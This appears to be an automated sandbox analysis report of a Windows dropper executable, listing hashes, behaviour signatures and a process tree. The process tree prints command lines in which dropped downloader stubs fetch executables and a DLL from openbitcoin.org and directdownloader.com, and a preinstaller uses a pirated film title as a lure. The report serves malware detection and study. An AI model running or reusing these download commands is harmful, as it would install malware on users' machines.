Analysis
-
max time kernel
99s -
max time network
112s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
25/12/2023, 00:22
Static task
static1
Behavioral task
behavioral1
Sample
1c96e43f9fc0224e4f6d32933e41aabd.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
1c96e43f9fc0224e4f6d32933e41aabd.exe
Resource
win10v2004-20231215-en
General
-
Target
1c96e43f9fc0224e4f6d32933e41aabd.exe
-
Size
492KB
-
MD5
1c96e43f9fc0224e4f6d32933e41aabd
-
SHA1
30c62455f99aeda70518bedfe18b889b13aaea8d
-
SHA256
46b1dbddd3052bb14cd159679cb6ab0f2b2e873ade6f156f4a4094cf7e21f0ee
-
SHA512
d6a193ddda998cef1a2191d7a0cebb7ad1cdd15ba5acabc6c290710c2802cf0c8b3f7930f271a65cb5b56bec1cc1b9e0d8ab0a6b70b83530f58434ecd02a0832
-
SSDEEP
6144:Kuk4fqjCHQqF6jtY03ZgLpp6TURimpBwXVUTL7E97IkXQxBRUoz0JehYvH7Aw0v9:w4fwM6peEUBwXVwM9vylzdYvH7AwC
Malware Config
Signatures
-
Executes dropped EXE 6 IoCs
pid Process 484 downloaderSTUB.exe 4884 downloaderSTUB.exe 4344 downloaderSTUB.exe 932 downloaderDDLR.exe 4764 downloaderOFFER0.exe 5108 preinstaller.exe -
Loads dropped DLL 20 IoCs
pid Process 4884 downloaderSTUB.exe 4344 downloaderSTUB.exe 4764 downloaderOFFER0.exe 932 downloaderDDLR.exe 484 downloaderSTUB.exe 484 downloaderSTUB.exe 4884 downloaderSTUB.exe 4764 downloaderOFFER0.exe 932 downloaderDDLR.exe 4344 downloaderSTUB.exe 4764 downloaderOFFER0.exe 484 downloaderSTUB.exe 4344 downloaderSTUB.exe 4884 downloaderSTUB.exe 932 downloaderDDLR.exe 4764 downloaderOFFER0.exe 484 downloaderSTUB.exe 4344 downloaderSTUB.exe 932 downloaderDDLR.exe 4884 downloaderSTUB.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x00060000000231f0-4.dat nsis_installer_1 behavioral2/files/0x00060000000231f0-4.dat nsis_installer_2 -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1288 wrote to memory of 484 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 91 PID 1288 wrote to memory of 484 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 91 PID 1288 wrote to memory of 484 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 91 PID 1288 wrote to memory of 4344 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 92 PID 1288 wrote to memory of 4344 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 92 PID 1288 wrote to memory of 4344 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 92 PID 1288 wrote to memory of 4884 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 93 PID 1288 wrote to memory of 4884 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 93 PID 1288 wrote to memory of 4884 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 93 PID 1288 wrote to memory of 932 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 95 PID 1288 wrote to memory of 932 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 95 PID 1288 wrote to memory of 932 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 95 PID 1288 wrote to memory of 4764 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 94 PID 1288 wrote to memory of 4764 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 94 PID 1288 wrote to memory of 4764 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 94 PID 1288 wrote to memory of 5108 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 96 PID 1288 wrote to memory of 5108 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 96 PID 1288 wrote to memory of 5108 1288 1c96e43f9fc0224e4f6d32933e41aabd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\1c96e43f9fc0224e4f6d32933e41aabd.exe"C:\Users\Admin\AppData\Local\Temp\1c96e43f9fc0224e4f6d32933e41aabd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exe /U "http://www.openbitcoin.org/static/dist/obc.exe" /D "C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\stub.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:484
-
-
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/OpenCL.dll" /D "C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\OpenCL.dll"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4344
-
-
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/updater.exe" /D "C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\updater.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4884
-
-
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderOFFER0.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderOFFER0.exe /U "http://www.directdownloader.com/toolbars/optimizer.exe" /D "C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\optimizer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4764
-
-
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderDDLR.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderDDLR.exe /U "http://www.directdownloader.com/DirectDownloaderInstaller.exe" /D "C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\DirectDownloaderInstaller.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:932
-
-
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\preinstaller.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\preinstaller.exe 0 "Pirates of the Caribbean 4; On Stranger Tides (2011) DVDRip NL s" "Download"2⤵
- Executes dropped EXE
PID:5108
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
58KB
MD5c7f6ed56312c8fbb58ae6ed445c38df4
SHA1e2dba94ef052db774478b9f7198c1a2298b334e5
SHA256fdb8452173a4f116f6e362ab5466c3c16bf6697502fe3d01db0d82f0e339de24
SHA512ac43e5bb31c3c0876a7768553916cce76d92088e62594e8463b128a0d6e587c48152a5efcf0b2a5e8fb43028d46913df114ae3c3750b7e6c4212c7044518ba43
-
Filesize
213KB
MD506baef00ae0f0e42fc5fea24fc4eac42
SHA19161574590f09cfe4c24498827386ed57f2e8c58
SHA25619460c3c1b450286c68fba77086c561e740374ae5c44213dd2ec22dc52a430b8
SHA51229431ff9f16fdd4122a10dfec0f260a4397e776daae2ef17defae71e037f082d48d186a24d229c408c9d1b0b4f02aaeaa69011e44cf399795f9c09903ac51486
-
Filesize
9KB
MD55bb835829c74e3d44811e3ede37949e7
SHA11387586645bd4cd164c9d30a01b6de0c8ec94613
SHA256f9b52c608d64d770f2f75858dfdf9328f07a47211713f56a25b82497ccda9cbe
SHA51246e913c700e9a0942a473c5124acfb2888ae118316836a04104507ab48dc5a03fea3f2d51fba9e77d2840b7f0b08623a488dfc7e19b75ed71f7dcc6cbfbc79ef
-
Filesize
14KB
MD5a5f8399a743ab7f9c88c645c35b1ebb5
SHA1168f3c158913b0367bf79fa413357fbe97018191
SHA256dacc88a12d3ba438fdae3535dc7a5a1d389bce13adc993706424874a782e51c9
SHA512824e567f5211bf09c7912537c7836d761b0934207612808e9a191f980375c6a97383dbc6b4a7121c6b5f508cbfd7542a781d6b6b196ca24841f73892eec5e977
-
Filesize
1KB
MD553bed1c9fa1d13d27cb3f5b75dfa3d18
SHA19a73c7c60ed8de903880c1c2cbf49db212968ed6
SHA2565a971fadbb73e21fe96734905392b92fc47ca8f243dcf0986d81bf361c398f85
SHA5120a88c16be3226821b64a2f0dd1500e762627bea2adeab0d87ed9e5863b8b7a28a1b997cc200f8acb1fe025bfb4ccfa52423bd78e920a4f50d554e3996350e497